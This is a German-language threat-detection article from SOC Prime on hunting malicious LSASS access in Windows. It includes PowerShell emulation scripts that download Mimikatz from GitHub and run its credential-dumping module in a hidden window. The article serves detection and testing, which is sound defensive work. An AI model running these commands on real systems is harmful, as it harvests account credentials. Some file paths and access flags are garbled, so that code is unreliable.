SOC Prime Bias: Mittel

11 Dez. 2025 17:46
newspaper icon Splunk

Jagdsaison auf bösartige LSASS-Zugriffe in Windows-Umgebungen

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
Jagdsaison auf bösartige LSASS-Zugriffe in Windows-Umgebungen
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

Der Artikel beschreibt, wie Angreifer Anmeldeinformationen extrahieren, indem sie mit Tools wie Mimikatz und Cobalt Strike auf den LSASS-Prozess zugreifen. Es werden die typischen Windows-API-Aufrufe, DLLs und Zugriffsrechte behandelt, die beim Dumping des LSASS-Speichers beteiligt sind. Die Autoren teilen aktualisierte Erkennungsabfragen für Sysmon und andere EDR-Plattformen, mit dem Schwerpunkt auf der Stärkung der Erkennungsabdeckung für das Credential-Dumping.

Untersuchung

Das Splunk Threat Research Team emulierte den LSASS-Zugriff mit Atomic Red Team, Mimikatz, Invoke-Mimikatz und Cobalt Strike. Sie erfassten Sysmon-Telemetrie, die das Laden von DLLs (dbgcore.dll, dbghelp.dll, ntdll.dll) und charakteristische GrantedAccess-Werte zeigt. Dieses Datenset wurde dann verwendet, um Erkennungsabfragen abzustimmen, die CallTrace-Informationen mit spezifischen Zugriffsrechten korrelieren.

Minderung

Passen Sie Sysmon- oder EDR-Richtlinien an, um Prozesszugriffsereignisse gegen lsass.exe zu protokollieren, indem Sie Filter auf bekannte DLLs und relevante Zugriffsrechte anwenden und vertrauenswürdige Systemprozesse auf die Whitelist setzen. Verwenden Sie die bereitgestellten Abfragen, um Warnungen zu verdächtigen LSASS-Zugriffsmustern zu erzeugen. Überprüfen und verfeinern Sie diese Regeln kontinuierlich, da neue Tools und Techniken auftauchen.

Reaktion

Wenn eine Erkennung ausgelöst wird, validieren Sie den Ursprungprozess, den zugehörigen Benutzerkontext und die an LSASS-Zugriff beteiligten DLLs. Isolieren Sie den betroffenen Endpunkt, erfassen Sie den Speicher für eine tiefere forensische Analyse und bewerten Sie Hinweise auf den Diebstahl von Anmeldeinformationen. Untersuchen Sie den Prozessbaum, um legitime administrative Dienstprogramme von Aktivitäten zu unterscheiden, die auf einen Angreifer hinweisen.

Angriffsfluss

Wir aktualisieren diesen Teil noch. Melden Sie sich an, um benachrichtigt zu werden

Benachrichtige mich

Simulation Ausführung

Voraussetzung: Der Telemetrie- und Basislinien-Vorflug-Check muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die dazu entwickelt wurde, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.

  • Angrifferzählung & Befehle:
    Ein Angreifer hat lokale Administratorrechte auf dem Opferhost erlangt und möchte Anmeldeinformationen für seitliche Bewegungen ernten. Sie kopieren das Open-Source-Tool Mimikatz auf die Maschine, erhöhen den Prozess auf DEBUG Rechte und rufen das sekurlsa::logonPasswords Modul auf, das LSASS-Speicher über native API-Aufrufe liest, die ntdll.dll durchqueren. Sysmon protokolliert dies als ein ProcessAccess-Ereignis mit mehreren Hochprivilegierten GrantedAccess Flags (z.B. 0x00100x14000x1fffff). Der Angreifer führt das Tool aus einer versteckten PowerShell-Sitzung aus, um eine UI-Exposition zu vermeiden.

    # 1. Mimikatz-Binärdatei in %TEMP% ablegen
$mkPath = "$env:TEMPmimikatz.exe"
Invoke-WebRequest -Uri "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0/mimikatz_trunk.zip" -OutFile "$env:TEMPmk.zip"
Expand-Archive -Path "$env:TEMPmk.zip" -DestinationPath $env:TEMP -Force
Move-Item -Path "$env:TEMPmimikatzx64mimikatz.exe" -Destination $mkPath -Force

# 2. Führen Sie Mimikatz mit Befehlen zum Dumpen von Anmeldeinformationen aus
Start-Process -FilePath $mkPath -ArgumentList 'privilege::debug sekurlsa::logonPasswords exit' -WindowStyle Hidden -Wait

  • Regressionstest-Skript:

    # ----------------------------------------------------------------------
# LSASS-Credential-Dumping-Simulation – löst Sigma-Regel #4e0789a0 aus…
# ----------------------------------------------------------------------
# Mimikatz ablegen (falls nicht bereits vorhanden)
$mkPath = "$env:TEMPmimikatz.exe"
if (-Not (Test-Path $mkPath)) {
    $zip = "$env:TEMPmk.zip"
    Invoke-WebRequest -Uri "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0/mimikatz_trunk.zip" -OutFile $zip
    Expand-Archive -Path $zip -DestinationPath $env:TEMP -Force
    Move-Item -Path "$env:TEMPmimikatzx64mimikatz.exe" -Destination $mkPath -Force
    Remove-Item $zip -Force
}

# Führen Sie Mimikatz aus, um LSASS-Anmeldeinformationen zu dumpen
$args = 'privilege::debug sekurlsa::logonPasswords exit'
Write-Host "[+] Mimikatz für LSASS-Dump ausführen..."
Start-Process -FilePath $mkPath -ArgumentList $args -WindowStyle Hidden -Wait
Write-Host "[+] Mimikatz-Ausführung abgeschlossen."
# ----------------------------------------------------------------------

  • Bereinigung Befehle:

    # Entfernen Sie die Mimikatz-Binärdatei und alle restlichen Dateien
$mkPath = "$env:TEMPmimikatz.exe"
if (Test-Path $mkPath) { Remove-Item $mkPath -Force }
$folder = "$env:TEMPmimikatz"
if (Test-Path $folder) { Remove-Item $folder -Recurse -Force }
Write-Host "Bereinigung abgeschlossen."

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit in Bedrohungen zu verbessern, die für Ihr Unternehmen am relevantesten sind. Um Ihnen den Einstieg zu erleichtern und sofortigen Nutzen zu bieten, buchen Sie jetzt ein Treffen mit SOC Prime-Experten.

Kostenlos beitreten